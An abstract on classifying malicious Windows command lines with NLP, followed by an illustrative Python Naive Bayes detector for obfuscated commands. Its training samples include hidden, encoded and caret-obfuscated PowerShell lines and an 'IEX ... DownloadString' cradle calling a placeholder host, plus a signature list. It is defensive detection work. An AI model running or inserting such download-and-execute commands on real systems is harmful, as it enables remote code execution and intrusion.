Abstract

Windows command-line arguments are used to administer the operating system through a command-line interface (CLI). That interface exposes several powerful system administration tools, among them PowerShell and WMIC. Ideally, CLI access is restricted for untrusted users and command-line inputs are logged for forensic investigation. Attackers, however, are adopting increasingly inventive command-line obfuscation techniques to slip past those controls and compromise the system. Traditional pattern matching is not a suitable detection mechanism for obfuscated command lines, because the space of possible obfuscated forms is far too large to enumerate with signatures. In this work we apply natural language processing techniques from artificial intelligence to classify Windows command lines as malicious or benign. We implemented a Multinomial Naive Bayes algorithm combined with a neural network and trained it on a data set of malicious command-line arguments. We evaluated the trained classifier in a real environment on both normal and obfuscated malicious command-line arguments and found the technique effective at classifying malicious command lines, both in terms of false positives and in terms of performance.
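The following Python block is an added illustration of the classification approach the abstract describes; it is not the paper's code and the paper's data set is not reproduced. It implements only the Multinomial Naive Bayes part (the neural-network stage is omitted), uses character 3-grams as features (an assumption, since the abstract does not state the feature representation), and trains on a handful of constructed benign and malicious command lines. The `signature_hit` helper is a hypothetical substring-based detector included to show why a caret-obfuscated command line evades fixed patterns while the n-gram classifier still flags it.

```python
"""Character n-gram Multinomial Naive Bayes for Windows command-line triage.

Added example, not the paper's implementation. Feature choice (character
3-grams) and all sample command lines are assumptions / constructed data.
"""
import math
from collections import Counter, defaultdict

N = 3  # n-gram size (assumption; the abstract does not specify features)


def ngrams(cmd: str, n: int = N) -> Counter:
    """Lower-case the command line and count overlapping character n-grams.

    Character n-grams (rather than whitespace tokens) make the model robust to
    obfuscation: a caret-split "p^o^w^e^r^s^h^e^l^l" still shares the flags
    and surrounding fragments with unobfuscated malicious samples.
    """
    s = cmd.lower()
    return Counter(s[i:i + n] for i in range(len(s) - n + 1))


class MultinomialNB:
    """Multinomial Naive Bayes with additive (Laplace) smoothing."""

    def __init__(self, alpha: float = 1.0):
        self.alpha = alpha
        self.class_counts = Counter()            # documents per class
        self.feature_counts = defaultdict(Counter)  # n-gram counts per class
        self.vocab = set()

    def fit(self, samples):
        for cmd, label in samples:
            feats = ngrams(cmd)
            self.class_counts[label] += 1
            self.feature_counts[label].update(feats)
            self.vocab.update(feats)
        return self

    def log_posteriors(self, cmd: str) -> dict:
        """Unnormalised log P(class | cmd) = log prior + sum of log likelihoods."""
        feats = ngrams(cmd)
        total_docs = sum(self.class_counts.values())
        scores = {}
        for label, n_docs in self.class_counts.items():
            fc = self.feature_counts[label]
            denom = sum(fc.values()) + self.alpha * len(self.vocab)
            score = math.log(n_docs / total_docs)
            for gram, k in feats.items():
                score += k * math.log((fc[gram] + self.alpha) / denom)
            scores[label] = score
        return scores

    def predict(self, cmd: str) -> str:
        lp = self.log_posteriors(cmd)
        return max(lp, key=lp.get)


# Constructed training samples (not a real data set).
TRAIN = [
    ("ipconfig /all", "benign"),
    (r"dir C:\Users\alice\Documents", "benign"),
    ("Get-Process | Sort-Object CPU -Descending", "benign"),
    (r"Get-ChildItem -Path C:\Logs -Recurse -Filter *.log", "benign"),
    ("net user alice /domain", "benign"),
    ("systeminfo", "benign"),
    ("Get-Service | Sort-Object Status", "benign"),
    (r"copy report.docx D:\backup\ ", "benign"),
    ("powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA", "malicious"),
    ("powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://example.invalid/a')\"", "malicious"),
    ("cmd /c s^e^t p=powershell&&call %p% -nop -w hidden -enc aQBlAHgA", "malicious"),
    ("powershell -nop -w hidden -c \"[Text.Encoding]::Unicode.GetString("
     "[Convert]::FromBase64String('SQBFAFgA'))\"", "malicious"),
    ("cmd /c s^t^a^r^t /b powershell -nop -w hidden -c \"IEX (New-Object "
     "Net.WebClient).DownloadString('http://example.invalid/b')\"", "malicious"),
]

# Constructed held-out samples: one plainly encoded, one caret-obfuscated, one benign.
HELDOUT_ENC = "PowerShell -NoP -W Hidden -Enc VwByAGkAdABlAC0ASABvAHMAdAA="
HELDOUT_CARET = "cmd /c p^o^w^e^r^s^h^e^l^l -nop -w hidden -enc ZABpAHIA"
HELDOUT_BENIGN = "Get-Process | Sort-Object WorkingSet -Descending"
HELDOUT = [(HELDOUT_ENC, "malicious"), (HELDOUT_CARET, "malicious"),
           (HELDOUT_BENIGN, "benign")]

# Hypothetical fixed-substring detector, standing in for "traditional pattern matching".
SIGNATURES = ("powershell", "downloadstring", "frombase64string")


def signature_hit(cmd: str) -> bool:
    low = cmd.lower()
    return any(sig in low for sig in SIGNATURES)


def evaluate(model: MultinomialNB, labelled) -> tuple:
    """Return (false_positives, false_negatives) over labelled samples."""
    fp = fn = 0
    for cmd, label in labelled:
        pred = model.predict(cmd)
        fp += pred == "malicious" and label == "benign"
        fn += pred == "benign" and label == "malicious"
    return fp, fn


if __name__ == "__main__":
    model = MultinomialNB().fit(TRAIN)
    for cmd, _ in HELDOUT:
        print(f"{model.predict(cmd):9s} sig={signature_hit(cmd)!s:5s} {cmd}")
    print("false positives / negatives:", evaluate(model, HELDOUT))
```

The caret-obfuscated sample contains no contiguous `powershell` string, so the substring detector misses it, while the n-gram model still scores it as malicious because `cmd /c`, `-nop -w hidden -enc` and the `^e^` fragment all appear in the malicious training lines. In practice the training corpus would be orders of magnitude larger and the feature vocabulary pruned; the smoothing parameter `alpha` and the n-gram size are the two knobs that most affect the false-positive rate on long, previously unseen benign command lines.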
